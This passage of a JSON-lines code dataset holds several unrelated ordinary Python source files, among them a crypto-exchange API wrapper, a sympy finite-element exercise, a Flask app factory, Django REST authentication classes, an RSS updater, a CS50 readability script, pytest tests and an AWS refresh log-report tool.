'lastTradeTimestamp': None,\n 'status': status,\n 'symbol': symbol,\n 'type': type,\n 'timeInForce': None,\n 'postOnly': None,\n 'side': side,\n 'price': price,\n 'stopPrice': None,\n 'average': average,\n 'cost': None,\n 'amount': amount,\n 'filled': filled,\n 'remaining': remaining,\n 'fee': fee,\n 'trades': None,\n }, market)\n\n def fetch_order(self, id, symbol=None, 
params={}):\n self.load_markets()\n request = {\n 'order_id': id,\n }\n response = self.privatePostV1OrderStatus(self.extend(request, params))\n return self.parse_order(response)\n\n def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):\n self.load_markets()\n response = self.privatePostV1Orders(params)\n market = None\n if symbol is not None:\n market = self.market(symbol) # throws on non-existent symbol\n return self.parse_orders(response, market, since, limit)\n\n def create_order(self, symbol, type, side, amount, price=None, params={}):\n self.load_markets()\n if type == 'market':\n raise ExchangeError(self.id + ' allows limit orders only')\n nonce = self.nonce()\n amountString = self.amount_to_precision(symbol, amount)\n priceString = self.price_to_precision(symbol, price)\n request = {\n 'client_order_id': str(nonce),\n 'symbol': self.market_id(symbol),\n 'amount': amountString,\n 'price': priceString,\n 'side': side,\n 'type': 'exchange limit', # gemini allows limit orders only\n }\n response = self.privatePostV1OrderNew(self.extend(request, params))\n return {\n 'info': response,\n 'id': response['order_id'],\n }\n\n def cancel_order(self, id, symbol=None, params={}):\n self.load_markets()\n request = {\n 'order_id': id,\n }\n return self.privatePostV1OrderCancel(self.extend(request, params))\n\n def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):\n if symbol is None:\n raise ArgumentsRequired(self.id + ' fetchMyTrades() requires a symbol argument')\n self.load_markets()\n market = self.market(symbol)\n request = {\n 'symbol': market['id'],\n }\n if limit is not None:\n request['limit_trades'] = limit\n if since is not None:\n request['timestamp'] = int(since / 1000)\n response = self.privatePostV1Mytrades(self.extend(request, params))\n return self.parse_trades(response, market, since, limit)\n\n def withdraw(self, code, amount, address, tag=None, params={}):\n tag, params = self.handle_withdraw_tag_and_params(tag, params)\n self.check_address(address)\n self.load_markets()\n currency = self.currency(code)\n request = {\n 'currency': currency['id'],\n 'amount': amount,\n 'address': address,\n }\n response = self.privatePostV1WithdrawCurrency(self.extend(request, params))\n return {\n 'info': response,\n 'id': self.safe_string(response, 'txHash'),\n }\n\n def nonce(self):\n return self.milliseconds()\n\n def fetch_transactions(self, code=None, since=None, limit=None, params={}):\n self.load_markets()\n request = {}\n if limit is not None:\n request['limit_transfers'] = limit\n if since is not None:\n request['timestamp'] = since\n response = self.privatePostV1Transfers(self.extend(request, params))\n return self.parse_transactions(response)\n\n def parse_transaction(self, transaction, currency=None):\n timestamp = self.safe_integer(transaction, 'timestampms')\n currencyId = self.safe_string(transaction, 'currency')\n code = self.safe_currency_code(currencyId, currency)\n address = self.safe_string(transaction, 'destination')\n type = self.safe_string_lower(transaction, 'type')\n status = 'pending'\n # When deposits show as Advanced or Complete they are available for trading.\n if transaction['status']:\n status = 'ok'\n fee = None\n feeAmount = self.safe_number(transaction, 'feeAmount')\n if feeAmount is not None:\n fee = {\n 'cost': feeAmount,\n 'currency': code,\n }\n return {\n 'info': transaction,\n 'id': self.safe_string(transaction, 'eid'),\n 'txid': self.safe_string(transaction, 'txHash'),\n 'timestamp': timestamp,\n 'datetime': 
self.iso8601(timestamp),\n 'network': None,\n 'address': address,\n 'addressTo': None,\n 'addressFrom': None,\n 'tag': None, # or is it defined?\n 'tagTo': None,\n 'tagFrom': None,\n 'type': type, # direction of the transaction,('deposit' | 'withdraw')\n 'amount': self.safe_number(transaction, 'amount'),\n 'currency': code,\n 'status': status,\n 'updated': None,\n 'fee': fee,\n }\n\n def parse_deposit_address(self, depositAddress, currency=None):\n #\n # {\n # address: \"0xed6494Fe7c1E56d1bd6136e89268C51E32d9708B\",\n # timestamp: \"1636813923098\",\n # addressVersion: \"eV1\" }\n # }\n #\n address = self.safe_string(depositAddress, 'address')\n return {\n 'currency': currency,\n 'network': None,\n 'address': address,\n 'tag': None,\n 'info': depositAddress,\n }\n\n def fetch_deposit_addresses_by_network(self, code, params={}):\n self.load_markets()\n network = self.safe_string(params, 'network')\n if network is None:\n raise ArgumentsRequired(self.id + 'fetchDepositAddressesByNetwork() requires a network parameter')\n params = self.omit(params, 'network')\n networks = self.safe_value(self.options, 'networks', {})\n networkId = self.safe_string(networks, network, network)\n networkIds = self.safe_value(self.options, 'networkIds', {})\n networkCode = self.safe_string(networkIds, networkId, network)\n request = {\n 'network': networkId,\n }\n response = self.privatePostV1AddressesNetwork(self.extend(request, params))\n results = self.parse_deposit_addresses(response, [code], False, {'network': networkCode, 'currency': code})\n return self.group_by(results, 'network')\n\n def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):\n url = '/' + self.implode_params(path, params)\n query = self.omit(params, self.extract_params(path))\n if api == 'private':\n self.check_required_credentials()\n apiKey = self.apiKey\n if apiKey.find('account') < 0:\n raise AuthenticationError(self.id + ' sign() requires an account-key, master-keys are not-supported')\n nonce = self.nonce()\n request = self.extend({\n 'request': url,\n 'nonce': nonce,\n }, query)\n payload = self.json(request)\n payload = self.string_to_base64(payload)\n signature = self.hmac(payload, self.encode(self.secret), hashlib.sha384)\n headers = {\n 'Content-Type': 'text/plain',\n 'X-GEMINI-APIKEY': self.apiKey,\n 'X-GEMINI-PAYLOAD': self.decode(payload),\n 'X-GEMINI-SIGNATURE': signature,\n }\n else:\n if query:\n url += '?' 
+ self.urlencode(query)\n url = self.urls['api'][api] + url\n return {'url': url, 'method': method, 'body': body, 'headers': headers}\n\n def handle_errors(self, httpCode, reason, url, method, headers, body, response, requestHeaders, requestBody):\n if response is None:\n if isinstance(body, basestring):\n feedback = self.id + ' ' + body\n self.throw_broadly_matched_exception(self.exceptions['broad'], body, feedback)\n return # fallback to default error handler\n #\n # {\n # \"result\": \"error\",\n # \"reason\": \"BadNonce\",\n # \"message\": \"Out-of-sequence nonce <1234> precedes previously used nonce <2345>\"\n # }\n #\n result = self.safe_string(response, 'result')\n if result == 'error':\n reason = self.safe_string(response, 'reason')\n message = self.safe_string(response, 'message')\n feedback = self.id + ' ' + message\n self.throw_exactly_matched_exception(self.exceptions['exact'], reason, feedback)\n self.throw_exactly_matched_exception(self.exceptions['exact'], message, feedback)\n self.throw_broadly_matched_exception(self.exceptions['broad'], message, feedback)\n raise ExchangeError(feedback) # unknown message\n\n def create_deposit_address(self, code, params={}):\n self.load_markets()\n currency = self.currency(code)\n request = {\n 'currency': currency['id'],\n }\n response = self.privatePostV1DepositCurrencyNewAddress(self.extend(request, params))\n address = self.safe_string(response, 'address')\n self.check_address(address)\n return {\n 'currency': code,\n 'address': address,\n 'tag': None,\n 'info': response,\n }\n\n def fetch_ohlcv(self, symbol, timeframe='5m', since=None, limit=None, params={}):\n self.load_markets()\n market = self.market(symbol)\n request = {\n 'timeframe': self.timeframes[timeframe],\n 'symbol': market['id'],\n }\n response = self.publicGetV2CandlesSymbolTimeframe(self.extend(request, params))\n #\n # [\n # [1591515000000,0.02509,0.02509,0.02509,0.02509,0],\n # [1591514700000,0.02503,0.02509,0.02503,0.02509,44.6405],\n # [1591514400000,0.02503,0.02503,0.02503,0.02503,0],\n # ]\n #\n return self.parse_ohlcvs(response, market, timeframe, since, limit)\n"} {"ext": "py", "sha": "1a30de7f68d314dd049d90fb37b192f967c53371", "content": "import sympy as sym\n\n# Computing with Dirichlet conditions: -u''=2 and sines\nx, L = sym.symbols('x L')\ne_Galerkin = x*(L-x) - 8*L**2*sym.pi**(-3)*sym.sin(sym.pi*x/L)\ne_colloc = x*(L-x) - 2*L**2*sym.pi**(-2)*sym.sin(sym.pi*x/L)\n\n# Verify max error for x=L/2\ndedx_Galerkin = sym.diff(e_Galerkin, x)\nprint((dedx_Galerkin.subs(x, L/2)))\ndedx_colloc = sym.diff(e_colloc, x)\nprint((dedx_colloc.subs(x, L/2)))\n\n# Compute max error: x=L/2, evaluate numerical, and simplify\nprint(('Max error Galerkin/least.sq.:', \\\n sym.simplify(e_Galerkin.subs(x, L/2).evalf(n=3))))\nprint(('Max error colloc.:', \\\n sym.simplify(e_colloc.subs(x, L/2).evalf(n=3))))\nimport sys\n#sys.exit(0)\n\n\n# Computing with Neumann and Dirichlet conditions: -u''=2\nx, C, D = sym.symbols('x C D')\ni, j = sym.symbols('i j', integer=True)\n\nintegrand = (i+1)*(j+1)*(1-x)**(i+j)\nA_ij = sym.integrate(integrand, (x, 0, 1))\nA_ij = sym.simplify(A_ij)\nprint(A_ij)\npsi_i = (1-x)**(i+1)\nintegrand = 2*psi_i - D*(i+1)*(1-x)**i\nb_i = sym.integrate(integrand, (x, 0, 1)) - C*psi_i.subs(x, 0)\nb_i = sym.factor(sym.simplify(b_i))\nprint(b_i)\nprint((sym.expand(2 - (2+i)*(D+C))))\n\n# Solving model2 problem with f(x) and fe1D.py\nfrom u_xx_f_sympy import model2, x, C, D, L\nm = 2\nu = model2(x**m, L, C, D)\nprint(u)\n#u_exact = lambda x: D + C*(x-L) + (1./6)*(L**3 - 
x**3)\nu_exact = sym.lambdify([x, C, D, L], u)\n\nimport numpy as np\nfrom fe1D import finite_element1D_naive, mesh_uniform\n# Override C, D and L with numeric values\nC = 5\nD = 2\nL = 4\n\nd = 1\n\nvertices, cells, dof_map = mesh_uniform(\n N_e=2, d=d, Omega=[0,L], symbolic=False)\nvertices[1] = 3\nessbc = {}\nessbc[dof_map[-1][-1]] = D\n\nc, A, b, timing = finite_element1D_naive(\n vertices, cells, dof_map,\n essbc,\n ilhs=lambda e, phi, r, s, X, x, h:\n phi[1][r](X, h)*phi[1][s](X, h),\n irhs=lambda e, phi, r, X, x, h:\n x**m*phi[0][r](X),\n blhs=lambda e, phi, r, s, X, x, h: 0,\n brhs=lambda e, phi, r, X, x, h:\n -C*phi[0][r](-1) if e == 0 else 0,\n intrule='GaussLegendre',\n verbose=False,\n )\n\n# Visualize\nfrom fe1D import u_glob\nx, u, nodes = u_glob(c, cells, vertices, dof_map)\nu_e = u_exact(x, C, D, L)\nprint((u_exact(nodes, C, D, L) - c)) # difference at the nodes\nimport matplotlib.pyplot as plt\nplt.plot(x, u, 'b-', x, u_e, 'r--')\nplt.legend(['finite elements, d=%d' %d, 'exact'], loc='upper left')\nplt.savefig('tmp.png'); plt.savefig('tmp.pdf')\nplt.show()\n\n\n"} {"ext": "py", "sha": "1a30def6c9ec654c39777ee271e1182c32e9da01", "content": "# -*- coding: utf-8 -*-\n\n\"\"\"\n This module exports functions to initialize the Flask application.\n\"\"\"\n\nimport random\nfrom typing import Callable, Dict\n\nimport flask\nimport flask_babel\n\nimport orchard.errors\nimport orchard.extensions\nimport orchard.system_status\n\n\ndef create_app(config: str = 'Development') -> flask.Flask:\n \"\"\"\n Create and initialize the Flask application.\n\n :param config: The name of the configuration class, valid values are ``Development``\n (default), ``Production``, and ``Testing``.\n :return: The initialized Flask application.\n \"\"\"\n configuration_values = {'Development', 'Production', 'Testing'}\n if config in configuration_values:\n config = 'orchard.configuration.{config}'.format(config = config)\n else: # pragma: no cover.\n config = 'orchard.configuration.Development'\n\n name = __name__.split('.')[0]\n app = flask.Flask(name, instance_relative_config = True)\n app.config.from_object(config)\n app.config.from_object('instance.Configuration')\n\n # Always use English as default language during testing.\n if app.testing: # pragma: no branch.\n app.config['BABEL_DEFAULT_LOCALE'] = 'en'\n\n _configure_blueprints(app)\n _configure_context_processor(app)\n _configure_extensions(app)\n _configure_logging(app)\n _configure_request_handlers(app)\n\n return app\n\n\ndef _configure_blueprints(app: flask.Flask):\n \"\"\"\n Register the blueprints.\n\n :param app: The application instance.\n \"\"\"\n app.register_blueprint(orchard.errors.blueprint)\n app.register_blueprint(orchard.system_status.blueprint)\n\n\ndef _configure_context_processor(app: flask.Flask):\n \"\"\"\n Set up the global context processors.\n\n :param app: The application instance.\n \"\"\"\n\n @app.context_processor\n def inject_jinja2() -> Dict[str, Callable]:\n \"\"\"\n Inject more functions into the scope of Jinja2 templates.\n\n :return: A dictionary\n \"\"\"\n jinja2_functions = {\n 'hasattr': hasattr,\n 'random_int': random.randint\n }\n\n return jinja2_functions\n\n\ndef _configure_extensions(app: flask.Flask):\n \"\"\"\n Register the extensions with the app and configure them as needed.\n\n :param app: The application instance.\n \"\"\"\n orchard.extensions.babel.init_app(app)\n orchard.extensions.cache.init_app(app)\n\n\ndef _configure_logging(app: flask.Flask): # pragma: no cover.\n \"\"\"\n Set up a file and a 
mail logger, unless the app is being debugged or tested.\n\n :param app: The application instance.\n \"\"\"\n if app.debug or app.testing:\n return\n\n # noinspection PyUnresolvedReferences\n import logging\n import logging.handlers\n import os\n\n # Set up the file logger.\n log_path = app.config['LOG_PATH']\n if not os.path.isdir(log_path):\n os.makedirs(log_path)\n\n log_file = os.path.join(log_path, '{file_name}.log'.format(file_name = app.name))\n log_format = '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'\n file_handler = logging.handlers.RotatingFileHandler(log_file, 'a', 1 * 1024 * 1024, 10)\n file_handler.setLevel(logging.INFO)\n file_handler.setFormatter(logging.Formatter(log_format))\n app.logger.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info('{name} Startup'.format(name = app.config['PROJECT_NAME']))\n\n # Set up the mail logger.\n if app.config.get('MAIL_SERVER', '') == '':\n return\n\n credentials = None\n if app.config['MAIL_USERNAME'] or app.config['MAIL_PASSWORD']:\n credentials = (app.config['MAIL_USERNAME'], app.config['MAIL_PASSWORD'])\n\n server = (app.config['MAIL_SERVER'], app.config['MAIL_PORT'])\n sender = app.config['MAIL_FROM']\n receivers = app.config['ADMINS']\n subject = '{name} Failure'.format(name = app.config['PROJECT_NAME'])\n secure = None\n if app.config['MAIL_SSL']:\n secure = ()\n mail_handler = logging.handlers.SMTPHandler(server, sender, receivers, subject, credentials,\n secure)\n mail_handler.setLevel(logging.ERROR)\n app.logger.addHandler(mail_handler)\n\n\ndef _configure_request_handlers(app: flask.Flask):\n \"\"\"\n Set up the global before and after request handlers.\n\n :param app: The application instance.\n \"\"\"\n\n @app.before_request\n def before_request():\n \"\"\"\n Set up a few things before handling the actual request.\n \"\"\"\n flask.g.locale = flask_babel.get_locale()\n flask.g.project_name = app.config['PROJECT_NAME']\n\n # Set a default title.\n flask.g.title = app.config['PROJECT_NAME']\n\n @app.after_request\n def after_request(response: flask.Response) -> flask.Response:\n \"\"\"\n Modify the response after the request has been handled.\n\n :return: The modified response.\n \"\"\"\n # http://www.gnuterrypratchett.com/\n response.headers.add(\"X-Clacks-Overhead\", \"GNU Terry Pratchett\")\n\n return response\n"} {"ext": "py", "sha": "1a30df187b06ad1ada7e013edba49b48570bd05e", "content": "import functools\nimport re\nfrom typing import Any, Dict, Optional, Tuple, Union\nfrom urllib.parse import urlsplit\n\nfrom django.apps import apps\nfrom django.contrib.auth.models import AnonymousUser\nfrom django.http import HttpRequest, JsonResponse\nfrom django.utils import timezone\nfrom rest_framework import authentication\nfrom rest_framework.exceptions import AuthenticationFailed\nfrom rest_framework.request import Request\n\n\nclass PersonalAPIKeyAuthentication(authentication.BaseAuthentication):\n \"\"\"A way of authenticating with personal API keys.\n Only the first key candidate found in the request is tried, and the order is:\n 1. Request Authorization header of type Bearer.\n 2. Request body.\n 3. 
Request query string.\n \"\"\"\n\n keyword = \"Bearer\"\n\n @classmethod\n def find_key_with_source(\n cls,\n request: Union[HttpRequest, Request],\n request_data: Optional[Dict[str, Any]] = None,\n extra_data: Optional[Dict[str, Any]] = None,\n ) -> Optional[Tuple[str, str]]:\n \"\"\"Try to find personal API key in request and return it along with where it was found.\"\"\"\n if \"HTTP_AUTHORIZATION\" in request.META:\n authorization_match = re.match(fr\"^{cls.keyword}\\s+(\\S.+)$\", request.META[\"HTTP_AUTHORIZATION\"])\n if authorization_match:\n return authorization_match.group(1).strip(), \"Authorization header\"\n data = request.data if request_data is None and isinstance(request, Request) else request_data\n\n if data and \"personal_api_key\" in data:\n return data[\"personal_api_key\"], \"body\"\n if \"personal_api_key\" in request.GET:\n return request.GET[\"personal_api_key\"], \"query string\"\n if extra_data and \"personal_api_key\" in extra_data:\n # compatibility with /capture endpoint\n return extra_data[\"personal_api_key\"], \"query string data\"\n return None\n\n @classmethod\n def find_key(\n cls,\n request: Union[HttpRequest, Request],\n request_data: Optional[Dict[str, Any]] = None,\n extra_data: Optional[Dict[str, Any]] = None,\n ) -> Optional[str]:\n \"\"\"Try to find personal API key in request and return it.\"\"\"\n key_with_source = cls.find_key_with_source(request, request_data, extra_data)\n return key_with_source[0] if key_with_source is not None else None\n\n @classmethod\n def authenticate(cls, request: Union[HttpRequest, Request]) -> Optional[Tuple[Any, None]]:\n personal_api_key_with_source = cls.find_key_with_source(request)\n if not personal_api_key_with_source:\n return None\n personal_api_key, source = personal_api_key_with_source\n PersonalAPIKey = apps.get_model(app_label=\"posthog\", model_name=\"PersonalAPIKey\")\n try:\n personal_api_key_object = (\n PersonalAPIKey.objects.select_related(\"user\").filter(user__is_active=True).get(value=personal_api_key)\n )\n except PersonalAPIKey.DoesNotExist:\n raise AuthenticationFailed(detail=f\"Personal API key found in request {source} is invalid.\")\n personal_api_key_object.last_used_at = timezone.now()\n personal_api_key_object.save()\n assert personal_api_key_object.user is not None\n return personal_api_key_object.user, None\n\n @classmethod\n def authenticate_header(cls, request) -> str:\n return cls.keyword\n\n\nclass TemporaryTokenAuthentication(authentication.BaseAuthentication):\n def authenticate(self, request: Request):\n # if the Origin is different, the only authentication method should be temporary_token\n # This happens when someone is trying to create actions from the editor on their own website\n if (\n request.headers.get(\"Origin\")\n and urlsplit(request.headers[\"Origin\"]).netloc not in urlsplit(request.build_absolute_uri(\"/\")).netloc\n ):\n if not request.GET.get(\"temporary_token\"):\n raise AuthenticationFailed(\n detail=\"No temporary_token set. \"\n + \"That means you're either trying to access this API from a different site, \"\n + \"or it means your proxy isn't sending the correct headers. 
\"\n + \"See https://posthog.com/docs/deployment/running-behind-proxy for more information.\"\n )\n if request.GET.get(\"temporary_token\"):\n User = apps.get_model(app_label=\"posthog\", model_name=\"User\")\n user = User.objects.filter(temporary_token=request.GET.get(\"temporary_token\"))\n if not user.exists():\n raise AuthenticationFailed(detail=\"User doesn't exist\")\n return (user.first(), None)\n return None\n\n\nclass PublicTokenAuthentication(authentication.BaseAuthentication):\n def authenticate(self, request: Request):\n if request.GET.get(\"share_token\") and request.parser_context and request.parser_context.get(\"kwargs\"):\n Dashboard = apps.get_model(app_label=\"posthog\", model_name=\"Dashboard\")\n dashboard = Dashboard.objects.filter(\n share_token=request.GET.get(\"share_token\"), pk=request.parser_context[\"kwargs\"].get(\"pk\"),\n ).first()\n if dashboard is None:\n raise AuthenticationFailed(detail=\"Dashboard doesn't exist\")\n if dashboard.team.organization.for_internal_metrics:\n return None\n return (AnonymousUser(), None)\n return None\n\n\ndef authenticate_secondarily(endpoint):\n \"\"\"\n DEPRECATED: Used for supporting legacy endpoints not on DRF.\n Authentication for function views.\n \"\"\"\n\n @functools.wraps(endpoint)\n def wrapper(request: HttpRequest):\n if not request.user.is_authenticated:\n try:\n auth_result = PersonalAPIKeyAuthentication.authenticate(request)\n if isinstance(auth_result, tuple) and auth_result[0].__class__.__name__ == \"User\":\n request.user = auth_result[0]\n else:\n raise AuthenticationFailed(\"Authentication credentials were not provided.\")\n except AuthenticationFailed as e:\n return JsonResponse({\"detail\": e.detail}, status=401)\n return endpoint(request)\n\n return wrapper\n"} {"ext": "py", "sha": "1a30e0a3525f29b83a01f77bce16e1f125b7a3b9", "content": "import attr\nimport logging\nimport os\n\nfrom datetime import datetime\nfrom feedparser import parse as parse_feed\nfrom typing import List, Optional\n\nfrom telegram_rss.config import FeedConfig\nfrom telegram_rss.utils import save_as, get_default_directory, load_dict\nfrom . 
import Entry, Channel, Feed\n\n\nclass FeedUpdater:\n def __init__(self, feed_config: FeedConfig, ext: str = \".json\"):\n self.feed_config = feed_config\n self._feed: Optional[Feed] = None\n self._local_feed: Optional[Feed] = None\n self.local_file = os.path.join(\n get_default_directory(),\n \"data\",\n f\"{self.feed_config.name}\" + ext,\n )\n self.logger = logging.getLogger(feed_config.name)\n\n def __call__(self, save: bool = True) -> List[Entry]:\n return self.get_new_entries(save=save)\n\n def get_new_entries(self, save: bool = True) -> List[Entry]:\n entries: List[Entry] = list()\n if not self.feed or self.feed == self.local_feed:\n self.logger.info(\"No new feeds found\")\n return entries\n for feed in self.feed:\n if feed in entries:\n continue\n if feed not in self.local_feed:\n entries.append(feed)\n if not entries:\n self.logger.debug(\"All feeds aleady in local_feeds\")\n return entries\n if self.feed_config.only_today:\n self.logger.debug(\"Filter feeds published only today\")\n now = datetime.now()\n for i in range(len(entries)):\n entry = entries[i]\n if not entry.time:\n continue\n if entry.time.date() == now.date():\n continue\n else:\n del entries[i]\n self.logger.info(f\"Found new {len(entries)} feeds\")\n if entries and save:\n self.save_feed(self.feed)\n self.logger.debug(f\"Saved {len(entries)} as {self.local_file}\")\n return entries\n\n @property\n def feed(self) -> Feed:\n if self._feed:\n return self._feed\n if self.feed_config.save_bandwith:\n raw_feed = parse_feed(\n self.feed_config.source,\n etag=self.feed_config.etag,\n modified=self.feed_config.modified,\n )\n else:\n raw_feed = parse_feed(self.feed_config.source)\n if raw_feed.status == 304:\n return Feed()\n self.feed_config.etag = raw_feed.etag\n self.feed_config.modified = raw_feed.modified\n self._feed = Feed.from_feedparser(raw_feed)\n return self._feed\n\n @property\n def local_feed(self) -> Feed:\n if self._local_feed:\n return self._local_feed\n if not os.path.isfile(self.local_file):\n return Feed()\n feed_data = load_dict(self.local_file)\n self._local_feed = Feed(**feed_data)\n return self._local_feed\n\n def save_feed(self, feed: Feed):\n feed_data = attr.asdict(feed, recurse=True)\n save_as(feed_data, self.local_file)\n\n @property\n def channel(self) -> Optional[Channel]:\n return self.feed.channel or self.local_feed.channel\n"} {"ext": "py", "sha": "1a30e27f6752935ad2570aabd89899bbd08e2c0c", "content": "#Imports library\nimport socket\n\n#Creates instance of 'Socket'\ns = socket.socket()\n\nhostname = 'tutorialspi' #Server IP/Hostname\nport = 8000 #Server Port\n\ns.connect((hostname,port)) #Connects to server\n\nwhile True:\n x = raw_input(\"Enter message: \") #Gets the message to be sent\n s.send(x.encode()) #Encodes and sends message (x)\n"} {"ext": "py", "sha": "1a30e28713306fca74d538ca5d38151d109a7df6", "content": "from cs50 import get_string\nimport re\n\ndef letters_counter(t, a):\n c = 0\n for i in t:\n if i in a or i in [j.upper() for j in a]:\n c += 1\n return c\n\ndef words_counter(t):\n match = re.split(\" \", t)\n return len(match)\n\ndef sentences_counter(t):\n match = re.split(\"[.!?]\", t)\n return len(match) - 1\n\ndef calculate(lc, wc, sc):\n l = (lc / wc) * 100\n s = (sc / wc) * 100\n index = 0.0588 * l - 0.296 * s - 15.8\n return round(index)\n\nalphabet = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\", \"t\", \"u\", \"v\", \"w\", \"x\", \"y\", \"z\"]\n\ntext = get_string(\"Text: 
\")\n\nletter_count = letters_counter(text, alphabet)\nword_count = words_counter(text)\nsentece_count = sentences_counter(text)\n\ncalc = calculate(letter_count, word_count, sentece_count)\n\nif calc < 1:\n print(\"Before Grade 1\")\nelif calc >= 16:\n print(\"Grade 16+\")\nelse:\n print(f\"Grade {calc}\")"} {"ext": "py", "sha": "1a30e2c0feb5cde5e43ac6cc54319171ee726324", "content": "import pytest\n\nfrom .common import JSON, Cookies, Headers, Query, Resp, get_paths\nfrom .test_plugin_falcon import api as falcon_api\nfrom .test_plugin_flask import api as flask_api\nfrom .test_plugin_flask_blueprint import api as flask_bp_api\nfrom .test_plugin_flask_view import api as flask_view_api\nfrom .test_plugin_starlette import api as starlette_api\n\n\n@pytest.mark.parametrize(\n \"api\", [flask_api, flask_bp_api, flask_view_api, falcon_api, starlette_api]\n)\ndef test_plugin_spec(api):\n models = {\n m.__name__: m.schema(ref_template=\"#/components/schemas/{model}\")\n for m in (Query, JSON, Resp, Cookies, Headers)\n }\n for name, schema in models.items():\n assert api.spec[\"components\"][\"schemas\"][name] == schema\n\n assert api.spec[\"tags\"] == [{\"name\": tag} for tag in (\"test\", \"health\", \"api\")]\n\n assert get_paths(api.spec) == [\n \"/api/user/{name}\",\n \"/api/user_annotated/{name}\",\n \"/ping\",\n ]\n\n ping = api.spec[\"paths\"][\"/ping\"][\"get\"]\n assert ping[\"tags\"] == [\"test\", \"health\"]\n assert ping[\"parameters\"][0][\"in\"] == \"header\"\n assert ping[\"summary\"] == \"summary\"\n assert ping[\"description\"] == \"description\"\n assert ping[\"operationId\"] == \"get_/ping\"\n\n user = api.spec[\"paths\"][\"/api/user/{name}\"][\"post\"]\n assert user[\"tags\"] == [\"api\", \"test\"]\n assert (\n user[\"requestBody\"][\"content\"][\"application/json\"][\"schema\"][\"$ref\"]\n == \"#/components/schemas/JSON\"\n )\n assert len(user[\"responses\"]) == 3\n\n params = user[\"parameters\"]\n for param in params:\n if param[\"in\"] == \"path\":\n assert param[\"name\"] == \"name\"\n elif param[\"in\"] == \"query\":\n assert param[\"name\"] == \"order\"\n"} {"ext": "py", "sha": "1a30e2c66974a7d59914df556af92bb1590f9655", "content": "from sqlalchemy.orm import Session\nfrom fastapi import Depends, Security\nfrom starlette.requests import Request\n\nfrom app.core.jwt import validate_token, reusable_oauth2\nfrom app.api.utils.db import get_db\n\n\ndef get_current_user(request: Request, token: str = Security(reusable_oauth2)):\n print(token)\n return request.state.user\n\n\ndef get_validated_current_user(db: Session = Depends(get_db), token: str = Security(reusable_oauth2)): # yapf: disable\n return validate_token(db, token)\n"} {"ext": "py", "sha": "1a30e3f815910632b27d740eb900bc201b72cffd", "content": "from os.path import dirname, basename, isfile, join\nimport glob\n\nmodules = glob.glob(join(dirname(__file__), '*.py'))\n__all__ = [basename(f)[:-3] for f in modules if isfile(f) and not f.endswith('__init__.py')]"} {"ext": "py", "sha": "1a30e4e56a5cb708fa316d595117561f9149bfae", "content": "import os\nimport argparse\nimport re\n\nimport utils\n\n\ndef aws_refresh_report(manifest, fname):\n \"\"\"\n Generate a aws refresh report by looking into the log file\n generated during aws refresh script running. 
The output is a report\n    containing the number of files copied and the total amount of data copied, in GiB\n\n    Args:\n        manifest(tsv): GDC manifest (active or legacy)\n        fname(str): the log file of running aws refresh script\n    \"\"\"\n    try:\n        with open(fname) as f:\n            content = f.readlines()\n    except IOError as e:\n        print(e)\n        os._exit(1)\n\n    lines = [x.strip() for x in content]\n\n    total_copying_files = 0\n    total_data = 0\n    awscli_copied_objects = set()\n    awscli_copied_data = 0\n    streaming_copied_objects = set()\n    streaming_copied_data = 0\n\n    for line in lines:\n        pattern = \"Total files need to be replicated: (.*)$\"\n        m = re.search(pattern, line)\n        if m:\n            total_copying_files = max(total_copying_files, int(m.group(1)))\n\n        pattern = \".*aws s3 mv s3://.*/(.{36})/.*\"\n        m = re.search(pattern, line)\n        if m:\n            awscli_copied_objects.add(m.group(1))\n\n        pattern = \".*aws s3 cp s3://gdcbackup/(.{36})/.*\"\n        m = re.search(pattern, line)\n        if m:\n            awscli_copied_objects.add(m.group(1))\n\n        pattern = \"successfully stream file (.{36})/.*\"\n        m = re.search(pattern, line)\n        if m:\n            streaming_copied_objects.add(m.group(1))\n\n    files, headers = utils.get_fileinfo_list_from_csv_manifest(manifest)\n    file_dict = {}\n    for fi in files:\n        file_dict[fi[\"id\"]] = fi\n\n    manifest_copied_files = 0\n    for uuid in awscli_copied_objects:\n        if uuid in file_dict:\n            manifest_copied_files += 1\n            awscli_copied_data += file_dict[uuid][\"size\"]*1.0/1024/1024/1024\n\n    for uuid in streaming_copied_objects:\n        if uuid in file_dict:\n            manifest_copied_files += 1\n            streaming_copied_data += file_dict[uuid][\"size\"]*1.0/1024/1024/1024\n\n    report = \"\"\"\n    Number of files need to be copied {}. Total {} (GiB)\n    Number of files were copied successfully via aws cli {}. Total {}(GiB)\n    Number of files were copied successfully via gdc api {}. 
Total {}(GiB)\n \"\"\".format(\n total_copying_files,\n total_data,\n len(awscli_copied_objects),\n awscli_copied_data,\n len(streaming_copied_objects),\n streaming_copied_data\n )\n\n print(report)\n\n copied_files = []\n for uuid in awscli_copied_objects.union(streaming_copied_objects):\n if uuid in file_dict:\n copied_files.append(file_dict[uuid])\n\n print(\"Saving list of copied files\")\n utils.write_csv(manifest.split(\"/\")[-1][:-4] + \"_aws_copied.tsv\", copied_files, fieldnames=headers)\n return report\n\ndef aws_refresh_validate(fname):\n \"\"\"\n Validate the aws data refresh by looking into the log after validation\n script finished.\n \"\"\"\n try:\n with open(fname) as f:\n content = f.readlines()\n except IOError as e:\n print(e)\n print(\"Please run the dcf validation job first\")\n os._exit(1)\n\n lines = [x.strip() for x in content]\n for line in lines:\n if \"TOTAL AWS COPY FAILURE CASES\" in line:\n print(line)\n return False\n return True\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(title=\"action\", dest=\"action\")\n\n aws_refresh_cmd = subparsers.add_parser(\"aws_refresh_report\")\n aws_refresh_cmd.add_argument(\"--manifest\", required=True)\n aws_refresh_cmd.add_argument(\"--log_file\", required=True)\n\n aws_validate_cmd = subparsers.add_parser(\"aws_refresh_validate\")\n aws_validate_cmd.add_argument(\"--manifest\", required=True)\n aws_validate_cmd.add_argument(\"--log_file\", required=True)\n\n return parser.parse_args()\n\ndef main():\n args = parse_arguments()\n fname = args.log_file\n manifest = args.manifest\n\n if args.action == \"aws_refresh_report\":\n aws_refresh_report(manifest, fname)\n elif args.action == \"aws_refresh_validate\":\n if aws_refresh_validate(fname):\n print(\"All the files in the manifest have 